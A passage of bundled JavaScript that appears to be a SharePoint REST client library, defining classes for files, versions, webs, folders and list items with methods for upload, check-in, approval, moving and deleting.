list item corresponding to the file. * */ get: function () { return new queryable_1.QueryableCollection(this, "listItemAllFields"); }, enumerable: true, configurable: true }); Object.defineProperty(File.prototype, "versions", { /** * Gets a collection of versions * */ get: function () { return new Versions(this); }, enumerable: true, configurable: true }); /** * Approves the file submitted for content approval with the specified comment. * Only documents in lists that are enabled for content approval can be approved. * * @param comment The comment for the approval. */ File.prototype.approve = function (comment) { if (comment === void 0) { comment = ""; } return this.clone(File, "approve(comment='" + comment + "')", true).post(); }; /** * Stops the chunk upload session without saving the uploaded data. Does not support batching. * If the file doesn’t already exist in the library, the partially uploaded file will be deleted. * Use this in response to user action (as in a request to cancel an upload) or an error or exception. * Use the uploadId value that was passed to the StartUpload method that started the upload session. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. */ File.prototype.cancelUpload = function (uploadId) { return this.clone(File, "cancelUpload(uploadId=guid'" + uploadId + "')", false).post(); }; /** * Checks the file in to a document library based on the check-in type. * * @param comment A comment for the check-in. Its length must be <= 1023. * @param checkinType The check-in type for the file. */ File.prototype.checkin = function (comment, checkinType) { if (comment === void 0) { comment = ""; } if (checkinType === void 0) { checkinType = CheckinType.Major; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "checkin(comment='" + comment + "',checkintype=" + checkinType + ")", true).post(); }; /** * Checks out the file from a document library. */ File.prototype.checkout = function () { return this.clone(File, "checkout", true).post(); }; /** * Copies the file to the destination url. * * @param url The absolute url or server relative url of the destination file path to copy to. * @param shouldOverWrite Should a file with the same name in the same location be overwritten? */ File.prototype.copyTo = function (url, shouldOverWrite) { if (shouldOverWrite === void 0) { shouldOverWrite = true; } return this.clone(File, "copyTo(strnewurl='" + url + "',boverwrite=" + shouldOverWrite + ")", true).post(); }; /** * Delete this file. * * @param eTag Value used in the IF-Match header, by default "*" */ File.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.clone(File, null, true).post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Denies approval for a file that was submitted for content approval. * Only documents in lists that are enabled for content approval can be denied. * * @param comment The comment for the denial. */ File.prototype.deny = function (comment) { if (comment === void 0) { comment = ""; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "deny(comment='" + comment + "')", true).post(); }; /** * Specifies the control set used to access, modify, or add Web Parts associated with this Web Part Page and view. * An exception is thrown if the file is not an ASPX page. * * @param scope The WebPartsPersonalizationScope view on the Web Parts page. */ File.prototype.getLimitedWebPartManager = function (scope) { if (scope === void 0) { scope = WebPartsPersonalizationScope.Shared; } return new webparts_1.LimitedWebPartManager(this, "getLimitedWebPartManager(scope=" + scope + ")"); }; /** * Moves the file to the specified destination url. * * @param url The absolute url or server relative url of the destination file path to move to. * @param moveOperations The bitwise MoveOperations value for how to move the file. */ File.prototype.moveTo = function (url, moveOperations) { if (moveOperations === void 0) { moveOperations = MoveOperations.Overwrite; } return this.clone(File, "moveTo(newurl='" + url + "',flags=" + moveOperations + ")", true).post(); }; /** * Submits the file for content approval with the specified comment. * * @param comment The comment for the published file. Its length must be <= 1023. */ File.prototype.publish = function (comment) { if (comment === void 0) { comment = ""; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "publish(comment='" + comment + "')", true).post(); }; /** * Moves the file to the Recycle Bin and returns the identifier of the new Recycle Bin item. * * @returns The GUID of the recycled file. */ File.prototype.recycle = function () { return this.clone(File, "recycle", true).post(); }; /** * Reverts an existing checkout for the file. * */ File.prototype.undoCheckout = function () { return this.clone(File, "undoCheckout", true).post(); }; /** * Removes the file from content approval or unpublish a major version. * * @param comment The comment for the unpublish operation. Its length must be <= 1023. */ File.prototype.unpublish = function (comment) { if (comment === void 0) { comment = ""; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "unpublish(comment='" + comment + "')", true).post(); }; /** * Gets the contents of the file as text. Not supported in batching. * */ File.prototype.getText = function () { return this.clone(File, "$value").get(new odata_1.TextFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Gets the contents of the file as a blob, does not work in Node.js. Not supported in batching. * */ File.prototype.getBlob = function () { return this.clone(File, "$value").get(new odata_1.BlobFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js. Not supported in batching. */ File.prototype.getBuffer = function () { return this.clone(File, "$value").get(new odata_1.BufferFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js. Not supported in batching. */ File.prototype.getJSON = function () { return this.clone(File, "$value").get(new odata_1.JSONFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Sets the content of a file, for large files use setContentChunked. Not supported in batching. * * @param content The file content * */ File.prototype.setContent = function (content) { var _this = this; return this.clone(File, "$value").post({ body: content, headers: { "X-HTTP-Method": "PUT", }, }).then(function (_) { return new File(_this); }); }; /** * Gets the associated list item for this folder, loading the default properties */ File.prototype.getItem = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } var q = this.listItemAllFields; return q.select.apply(q, selects).get().then(function (d) { return util_1.Util.extend(new items_1.Item(odata_2.getEntityUrl(d)), d); }); }; /** * Sets the contents of a file using a chunked upload approach. Not supported in batching. * * @param file The file to upload * @param progress A callback function which can be used to track the progress of the upload * @param chunkSize The size of each file slice, in bytes (default: 10485760) */ File.prototype.setContentChunked = function (file, progress, chunkSize) { if (chunkSize === void 0) { chunkSize = 10485760; } if (typeof progress === "undefined") { progress = function () { return null; }; } var self = this; var fileSize = file.size; var blockCount = parseInt((file.size / chunkSize).toString(), 10) + ((file.size % chunkSize === 0) ? 1 : 0); var uploadId = util_1.Util.getGUID(); // start the chain with the first fragment progress({ blockNumber: 1, chunkSize: chunkSize, currentPointer: 0, fileSize: fileSize, stage: "starting", totalBlocks: blockCount }); var chain = self.startUpload(uploadId, file.slice(0, chunkSize)); var _loop_1 = function (i) { chain = chain.then(function (pointer) { progress({ blockNumber: i, chunkSize: chunkSize, currentPointer: pointer, fileSize: fileSize, stage: "continue", totalBlocks: blockCount }); return self.continueUpload(uploadId, pointer, file.slice(pointer, pointer + chunkSize)); }); }; // skip the first and last blocks for (var i = 2; i < blockCount; i++) { _loop_1(i); } return chain.then(function (pointer) { progress({ blockNumber: blockCount, chunkSize: chunkSize, currentPointer: pointer, fileSize: fileSize, stage: "finishing", totalBlocks: blockCount }); return self.finishUpload(uploadId, pointer, file.slice(pointer)); }).then(function (_) { return self; }); }; /** * Starts a new chunk upload session and uploads the first fragment. * The current file content is not changed when this method completes. * The method is idempotent (and therefore does not change the result) as long as you use the same values for uploadId and stream. * The upload session ends either when you use the CancelUpload method or when you successfully * complete the upload session by passing the rest of the file contents through the ContinueUpload and FinishUpload methods. * The StartUpload and ContinueUpload methods return the size of the running total of uploaded data in bytes, * so you can pass those return values to subsequent uses of ContinueUpload and FinishUpload. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. * @param fragment The file contents. * @returns The size of the total uploaded data in bytes. */ File.prototype.startUpload = function (uploadId, fragment) { return this.clone(File, "startUpload(uploadId=guid'" + uploadId + "')").postAs({ body: fragment }).then(function (n) { return parseFloat(n); }); }; /** * Continues the chunk upload session with an additional fragment. * The current file content is not changed. * Use the uploadId value that was passed to the StartUpload method that started the upload session. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. * @param fileOffset The size of the offset into the file where the fragment starts. * @param fragment The file contents. * @returns The size of the total uploaded data in bytes. */ File.prototype.continueUpload = function (uploadId, fileOffset, fragment) { return this.clone(File, "continueUpload(uploadId=guid'" + uploadId + "',fileOffset=" + fileOffset + ")").postAs({ body: fragment }).then(function (n) { return parseFloat(n); }); }; /** * Uploads the last file fragment and commits the file. The current file content is changed when this method completes. * Use the uploadId value that was passed to the StartUpload method that started the upload session. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. * @param fileOffset The size of the offset into the file where the fragment starts. * @param fragment The file contents. * @returns The newly uploaded file. */ File.prototype.finishUpload = function (uploadId, fileOffset, fragment) { return this.clone(File, "finishUpload(uploadId=guid'" + uploadId + "',fileOffset=" + fileOffset + ")") .postAs({ body: fragment }).then(function (response) { return { data: response, file: new File(response.ServerRelativeUrl), }; }); }; return File; }(queryableshareable_1.QueryableShareableFile)); exports.File = File; /** * Describes a collection of Version objects * */ var Versions = (function (_super) { __extends(Versions, _super); /** * Creates a new instance of the File class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Versions(baseUrl, path) { if (path === void 0) { path = "versions"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a version by id * * @param versionId The id of the version to retrieve */ Versions.prototype.getById = function (versionId) { var v = new Version(this); v.concat("(" + versionId + ")"); return v; }; /** * Deletes all the file version objects in the collection. * */ Versions.prototype.deleteAll = function () { return new Versions(this, "deleteAll").post(); }; /** * Deletes the specified version of the file. * * @param versionId The ID of the file version to delete. */ Versions.prototype.deleteById = function (versionId) { return this.clone(Versions, "deleteById(vid=" + versionId + ")", true).post(); }; /** * Deletes the file version object with the specified version label. * * @param label The version label of the file version to delete, for example: 1.2 */ Versions.prototype.deleteByLabel = function (label) { return this.clone(Versions, "deleteByLabel(versionlabel='" + label + "')", true).post(); }; /** * Creates a new file version from the file specified by the version label. * * @param label The version label of the file version to restore, for example: 1.2 */ Versions.prototype.restoreByLabel = function (label) { return this.clone(Versions, "restoreByLabel(versionlabel='" + label + "')", true).post(); }; return Versions; }(queryable_1.QueryableCollection)); exports.Versions = Versions; /** * Describes a single Version instance * */ var Version = (function (_super) { __extends(Version, _super); function Version() { return _super !== null && _super.apply(this, arguments) || this; } /** * Delete a specific version of a file. * * @param eTag Value used in the IF-Match header, by default "*" */ Version.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; return Version; }(queryable_1.QueryableInstance)); exports.Version = Version; var CheckinType; (function (CheckinType) { CheckinType[CheckinType["Minor"] = 0] = "Minor"; CheckinType[CheckinType["Major"] = 1] = "Major"; CheckinType[CheckinType["Overwrite"] = 2] = "Overwrite"; })(CheckinType = exports.CheckinType || (exports.CheckinType = {})); var WebPartsPersonalizationScope; (function (WebPartsPersonalizationScope) { WebPartsPersonalizationScope[WebPartsPersonalizationScope["User"] = 0] = "User"; WebPartsPersonalizationScope[WebPartsPersonalizationScope["Shared"] = 1] = "Shared"; })(WebPartsPersonalizationScope = exports.WebPartsPersonalizationScope || (exports.WebPartsPersonalizationScope = {})); var MoveOperations; (function (MoveOperations) { MoveOperations[MoveOperations["Overwrite"] = 1] = "Overwrite"; MoveOperations[MoveOperations["AllowBrokenThickets"] = 8] = "AllowBrokenThickets"; })(MoveOperations = exports.MoveOperations || (exports.MoveOperations = {})); var TemplateFileType; (function (TemplateFileType) { TemplateFileType[TemplateFileType["StandardPage"] = 0] = "StandardPage"; TemplateFileType[TemplateFileType["WikiPage"] = 1] = "WikiPage"; TemplateFileType[TemplateFileType["FormPage"] = 2] = "FormPage"; })(TemplateFileType = exports.TemplateFileType || (exports.TemplateFileType = {})); /***/ }), /* 8 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) { var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d; if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc); else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r; return c > 3 && r && Object.defineProperty(target, key, r), r; }; Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var lists_1 = __webpack_require__(11); var fields_1 = __webpack_require__(24); var navigation_1 = __webpack_require__(25); var sitegroups_1 = __webpack_require__(18); var contenttypes_1 = __webpack_require__(16); var folders_1 = __webpack_require__(9); var roles_1 = __webpack_require__(17); var files_1 = __webpack_require__(7); var util_1 = __webpack_require__(0); var lists_2 = __webpack_require__(11); var siteusers_1 = __webpack_require__(30); var usercustomactions_1 = __webpack_require__(19); var odata_1 = __webpack_require__(2); var features_1 = __webpack_require__(23); var decorators_1 = __webpack_require__(51); var queryableshareable_1 = __webpack_require__(12); var relateditems_1 = __webpack_require__(46); var Webs = (function (_super) { __extends(Webs, _super); function Webs(baseUrl, webPath) { if (webPath === void 0) { webPath = "webs"; } return _super.call(this, baseUrl, webPath) || this; } /** * Adds a new web to the collection * * @param title The new web's title * @param url The new web's relative url * @param description The web web's description * @param template The web's template * @param language The language code to use for this web * @param inheritPermissions If true permissions will be inherited from the partent web * @param additionalSettings Will be passed as part of the web creation body */ Webs.prototype.add = function (title, url, description, template, language, inheritPermissions, additionalSettings) { if (description === void 0) { description = ""; } if (template === void 0) { template = "STS"; } if (language === void 0) { language = 1033; } if (inheritPermissions === void 0) { inheritPermissions = true; } if (additionalSettings === void 0) { additionalSettings = {}; } var props = util_1.Util.extend({ Description: description, Language: language, Title: title, Url: url, UseSamePermissionsAsParentSite: inheritPermissions, WebTemplate: template, }, additionalSettings); var postBody = JSON.stringify({ "parameters": util_1.Util.extend({ "__metadata": { "type": "SP.WebCreationInformation" }, }, props), }); return this.clone(Webs, "add", true).post({ body: postBody }).then(function (data) { return { data: data, web: new Web(odata_1.extractOdataId(data).replace(/_api\/web\/?/i, "")), }; }); }; return Webs; }(queryable_1.QueryableCollection)); exports.Webs = Webs; var WebInfos = (function (_super) { __extends(WebInfos, _super); function WebInfos(baseUrl, webPath) { if (webPath === void 0) { webPath = "webinfos"; } return _super.call(this, baseUrl, webPath) || this; } return WebInfos; }(queryable_1.QueryableCollection)); exports.WebInfos = WebInfos; /** * Describes a web * */ var Web = (function (_super) { __extends(Web, _super); function Web(baseUrl, path) { if (path === void 0) { path = "_api/web"; } return _super.call(this, baseUrl, path) || this; } /** * Creates a new web instance from the given url by indexing the location of the /_api/ * segment. If this is not found the method creates a new web with the entire string as * supplied. * * @param url */ Web.fromUrl = function (url, path) { if (url === null) { return new Web(""); } var index = url.indexOf("_api/"); if (index > -1) { return new Web(url.substr(0, index), path); } return new Web(url, path); }; Object.defineProperty(Web.prototype, "webs", { get: function () { return new Webs(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "webinfos", { get: function () { return new WebInfos(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "contentTypes", { /** * Get the content types available in this web * */ get: function () { return new contenttypes_1.ContentTypes(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "lists", { /** * Get the lists in this web * */ get: function () { return new lists_1.Lists(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "fields", { /** * Gets the fields in this web * */ get: function () { return new fields_1.Fields(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "features", { /** * Gets the active features for this web * */ get: function () { return new features_1.Features(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "availablefields", { /** * Gets the available fields in this web * */ get: function () { return new fields_1.Fields(this, "availablefields"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "navigation", { /** * Get the navigation options in this web * */ get: function () { return new navigation_1.Navigation(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "siteUsers", { /** * Gets the site users * */ get: function () { return new siteusers_1.SiteUsers(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "siteGroups", { /** * Gets the site groups * */ get: function () { return new sitegroups_1.SiteGroups(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "currentUser", { /** * Gets the current user */ get: function () { return new siteusers_1.CurrentUser(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "folders", { /** * Get the folders in this web * */ get: function () { return new folders_1.Folders(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "userCustomActions", { /** * Get all custom actions on a site * */ get: function () { return new usercustomactions_1.UserCustomActions(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "roleDefinitions", { /** * Gets the collection of RoleDefinition resources. * */ get: function () { return new roles_1.RoleDefinitions(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "relatedItems", { /** * Provides an interface to manage related items * */ get: function () { return relateditems_1.RelatedItemManagerImpl.FromUrl(this.toUrl()); }, enumerable: true, configurable: true }); /** * Creates a new batch for requests within the context of context this web * */ Web.prototype.createBatch = function () { return new odata_1.ODataBatch(this.parentUrl); }; Object.defineProperty(Web.prototype, "rootFolder", { /** * The root folder of the web */ get: function () { return new folders_1.Folder(this, "rootFolder"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "associatedOwnerGroup", { get: function () { return new sitegroups_1.SiteGroup(this, "associatedownergroup"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "associatedMemberGroup", { get: function () { return new sitegroups_1.SiteGroup(this, "associatedmembergroup"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "associatedVisitorGroup", { get: function () { return new sitegroups_1.SiteGroup(this, "associatedvisitorgroup"); }, enumerable: true, configurable: true }); /** * Get a folder by server relative url * * @param folderRelativeUrl the server relative path to the folder (including /sites/ if applicable) */ Web.prototype.getFolderByServerRelativeUrl = function (folderRelativeUrl) { return new folders_1.Folder(this, "getFolderByServerRelativeUrl('" + folderRelativeUrl + "')"); }; /** * Get a file by server relative url * * @param fileRelativeUrl the server relative path to the file (including /sites/ if applicable) */ Web.prototype.getFileByServerRelativeUrl = function (fileRelativeUrl) { return new files_1.File(this, "getFileByServerRelativeUrl('" + fileRelativeUrl + "')"); }; /** * Get a list by server relative url (list's root folder) * * @param listRelativeUrl the server relative path to the list's root folder (including /sites/ if applicable) */ Web.prototype.getList = function (listRelativeUrl) { return new lists_2.List(this, "getList('" + listRelativeUrl + "')"); }; /** * Updates this web intance with the supplied properties * * @param properties A plain object hash of values to update for the web */ Web.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.Web" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, web: _this, }; }); }; /** * Delete this web * */ Web.prototype.delete = function () { return _super.prototype.delete.call(this); }; /** * Applies the theme specified by the contents of each of the files specified in the arguments to the site. * * @param colorPaletteUrl Server-relative URL of the color palette file. * @param fontSchemeUrl Server-relative URL of the font scheme. * @param backgroundImageUrl Server-relative URL of the background image. * @param shareGenerated true to store the generated theme files in the root site, or false to store them in this site. */ Web.prototype.applyTheme = function (colorPaletteUrl, fontSchemeUrl, backgroundImageUrl, shareGenerated) { var postBody = JSON.stringify({ backgroundImageUrl: backgroundImageUrl, colorPaletteUrl: colorPaletteUrl, fontSchemeUrl: fontSchemeUrl, shareGenerated: shareGenerated, }); return this.clone(Web, "applytheme", true).post({ body: postBody }); }; /** * Applies the specified site definition or site template to the Web site that has no template applied to it. * * @param template Name of the site definition or the name of the site template */ Web.prototype.applyWebTemplate = function (template) { var q = this.clone(Web, "applywebtemplate", true); q.concat("(@t)"); q.query.add("@t", template); return q.post(); }; /** * Returns whether the current user has the given set of permissions. * * @param perms The high and low permission range. */ Web.prototype.doesUserHavePermissions = function (perms) { var q = this.clone(Web, "doesuserhavepermissions", true); q.concat("(@p)"); q.query.add("@p", JSON.stringify(perms)); return q.get(); }; /** * Checks whether the specified login name belongs to a valid user in the site. If the user doesn't exist, adds the user to the site. * * @param loginName The login name of the user (ex: i:0#.f|membership|[email protected]) */ Web.prototype.ensureUser = function (loginName) { var postBody = JSON.stringify({ logonName: loginName, }); return this.clone(Web, "ensureuser", true).post({ body: postBody }).then(function (data) { return { data: data, user: new siteusers_1.SiteUser(odata_1.extractOdataId(data)), }; }); }; /** * Returns a collection of site templates available for the site. * * @param language The LCID of the site templates to get. * @param true to include language-neutral site templates; otherwise false */ Web.prototype.availableWebTemplates = function (language, includeCrossLanugage) { if (language === void 0) { language = 1033; } if (includeCrossLanugage === void 0) { includeCrossLanugage = true; } return new queryable_1.QueryableCollection(this, "getavailablewebtemplates(lcid=" + language + ", doincludecrosslanguage=" + includeCrossLanugage + ")"); }; /** * Returns the list gallery on the site. * * @param type The gallery type - WebTemplateCatalog = 111, WebPartCatalog = 113 ListTemplateCatalog = 114, * MasterPageCatalog = 116, SolutionCatalog = 121, ThemeCatalog = 123, DesignCatalog = 124, AppDataCatalog = 125 */ Web.prototype.getCatalog = function (type) { return this.clone(Web, "getcatalog(" + type + ")", true).select("Id").get().then(function (data) { return new lists_2.List(odata_1.extractOdataId(data)); }); }; /** * Returns the collection of changes from the change log that have occurred within the list, based on the specified query. */ Web.prototype.getChanges = function (query) { var postBody = JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.ChangeQuery" } }, query) }); return this.clone(Web, "getchanges", true).post({ body: postBody }); }; Object.defineProperty(Web.prototype, "customListTemplate", { /** * Gets the custom list templates for the site. * */ get: function () { return new queryable_1.QueryableCollection(this, "getcustomlisttemplates"); }, enumerable: true, configurable: true }); /** * Returns the user corresponding to the specified member identifier for the current site. * * @param id The ID of the user. */ Web.prototype.getUserById = function (id) { return new siteusers_1.SiteUser(this, "getUserById(" + id + ")"); }; /** * Returns the name of the image file for the icon that is used to represent the specified file. * * @param filename The file name. If this parameter is empty, the server returns an empty string. * @param size The size of the icon: 16x16 pixels = 0, 32x32 pixels = 1. * @param progId The ProgID of the application that was used to create the file, in the form OLEServerName.ObjectName */ Web.prototype.mapToIcon = function (filename, size, progId) { if (size === void 0) { size = 0; } if (progId === void 0) { progId = ""; } return this.clone(Web, "maptoicon(filename='" + filename + "', progid='" + progId + "', size=" + size + ")", true).get(); }; return Web; }(queryableshareable_1.QueryableShareableWeb)); __decorate([ decorators_1.deprecated("This method will be removed in future releases. Please use the methods found in queryable securable.") ], Web.prototype, "doesUserHavePermissions", null); exports.Web = Web; /***/ }), /* 9 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var queryableshareable_1 = __webpack_require__(12); var files_1 = __webpack_require__(7); var util_1 = __webpack_require__(0); var odata_1 = __webpack_require__(2); var items_1 = __webpack_require__(10); /** * Describes a collection of Folder objects * */ var Folders = (function (_super) { __extends(Folders, _super); /** * Creates a new instance of the Folders class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Folders(baseUrl, path) { if (path === void 0) { path = "folders"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a folder by folder name * */ Folders.prototype.getByName = function (name) { var f = new Folder(this); f.concat("('" + name + "')"); return f; }; /** * Adds a new folder to the current folder (relative) or any folder (absolute) * * @param url The relative or absolute url where the new folder will be created. Urls starting with a forward slash are absolute. * @returns The new Folder and the raw response. */ Folders.prototype.add = function (url) { var _this = this; return this.clone(Folders, "add('" + url + "')", true).post().then(function (response) { return { data: response, folder: _this.getByName(url), }; }); }; return Folders; }(queryable_1.QueryableCollection)); exports.Folders = Folders; /** * Describes a single Folder instance * */ var Folder = (function (_super) { __extends(Folder, _super); function Folder() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(Folder.prototype, "contentTypeOrder", { /** * Specifies the sequence in which content types are displayed. * */ get: function () { return new queryable_1.QueryableCollection(this, "contentTypeOrder"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "files", { /** * Gets this folder's files * */ get: function () { return new files_1.Files(this); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "folders", { /** * Gets this folder's sub folders * */ get: function () { return new Folders(this); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "listItemAllFields", { /** * Gets this folder's list item field values * */ get: function () { return new queryable_1.QueryableCollection(this, "listItemAllFields"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "parentFolder", { /** * Gets the parent folder, if available * */ get: function () { return new Folder(this, "parentFolder"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "properties", { /** * Gets this folder's properties * */ get: function () { return new queryable_1.QueryableInstance(this, "properties"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "serverRelativeUrl", { /** * Gets this folder's server relative url * */ get: function () { return new queryable_1.Queryable(this, "serverRelativeUrl"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "uniqueContentTypeOrder", { /** * Gets a value that specifies the content type order. * */ get: function () { return new queryable_1.QueryableCollection(this, "uniqueContentTypeOrder"); }, enumerable: true, configurable: true }); Folder.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.Folder" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, folder: _this, }; }); }; /** * Delete this folder * * @param eTag Value used in the IF-Match header, by default "*" */ Folder.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.clone(Folder, null, true).post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Moves the folder to the Recycle Bin and returns the identifier of the new Recycle Bin item. */ Folder.prototype.recycle = function () { return this.clone(Folder, "recycle", true).post(); }; /** * Gets the associated list item for this folder, loading the default properties */ Folder.prototype.getItem = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } var q = this.listItemAllFields; return q.select.apply(q, selects).get().then(function (d) { return util_1.Util.extend(new items_1.Item(odata_1.getEntityUrl(d)), d); }); }; return Folder; }(queryableshareable_1.QueryableShareableFolder)); exports.Folder = Folder; /***/ }), /* 10 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var queryableshareable_1 = __webpack_require__(12); var folders_1 = __webpack_require__(9); var files_1 = __webpack_require__(7); var contenttypes_1 = __webpack_require__(16); var util_1 = __webpack_require__(0); var odata_1 = __webpack_require__(2); var attachmentfiles_1 = __webpack_require__(42); var lists_1 = __webpack_require__(11); /** * Describes a collection of Item objects * */ var Items = (function (_super) { __extends(Items, _super); /** * Creates a new instance of the Items class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Items(baseUrl, path) { if (path === void 0) { path = "items"; } return _super.call(this, baseUrl, path) || this; } /** * Gets an Item by id * * @param id The integer id of the item to retrieve */ Items.prototype.getById = function (id) { var i = new Item(this); i.concat("(" + id + ")"); return i; }; /** * Skips the specified number of items (https://msdn.microsoft.com/en-us/library/office/fp142385.aspx#sectionSection6) * * @param skip The starting id where the page should start, use with top to specify pages */ Items.prototype.skip = function (skip) { this._query.add("$skiptoken", encodeURIComponent("Paged=TRUE&p_ID=" + skip)); return this; }; /** * Gets a collection designed to aid in paging through data * */ Items.prototype.getPaged = function () { return this.getAs(new PagedItemCollectionParser()); }; // /** * Adds a new item to the collection * * @param properties The new items's properties */ Items.prototype.add = function (properties, listItemEntityTypeFullName) { var _this = this; if (properties === void 0) { properties = {}; } if (listItemEntityTypeFullName === void 0) { listItemEntityTypeFullName = null; } var removeDependency = this.addBatchDependency(); return this.ensureListItemEntityTypeName(listItemEntityTypeFullName).then(function (listItemEntityType) { var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": listItemEntityType }, }, properties)); var promise = _this.clone(Items, null, true).postAs({ body: postBody }).then(function (data) { return { data: data, item: _this.getById(data.Id), }; }); removeDependency(); return promise; }); }; /** * Ensures we have the proper list item entity type name, either from the value provided or from the list * * @param candidatelistItemEntityTypeFullName The potential type name */ Items.prototype.ensureListItemEntityTypeName = function (candidatelistItemEntityTypeFullName) { return candidatelistItemEntityTypeFullName ? Promise.resolve(candidatelistItemEntityTypeFullName) : this.getParent(lists_1.List).getListItemEntityTypeFullName(); }; return Items; }(queryable_1.QueryableCollection)); exports.Items = Items; /** * Descrines a single Item instance * */ var Item = (function (_super) { __extends(Item, _super); function Item() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(Item.prototype, "attachmentFiles", { /** * Gets the set of attachments for this item * */ get: function () { return new attachmentfiles_1.AttachmentFiles(this); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "contentType", { /** * Gets the content type for this item * */ get: function () { return new contenttypes_1.ContentType(this, "ContentType"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "effectiveBasePermissions", { /** * Gets the effective base permissions for the item * */ get: function () { return new 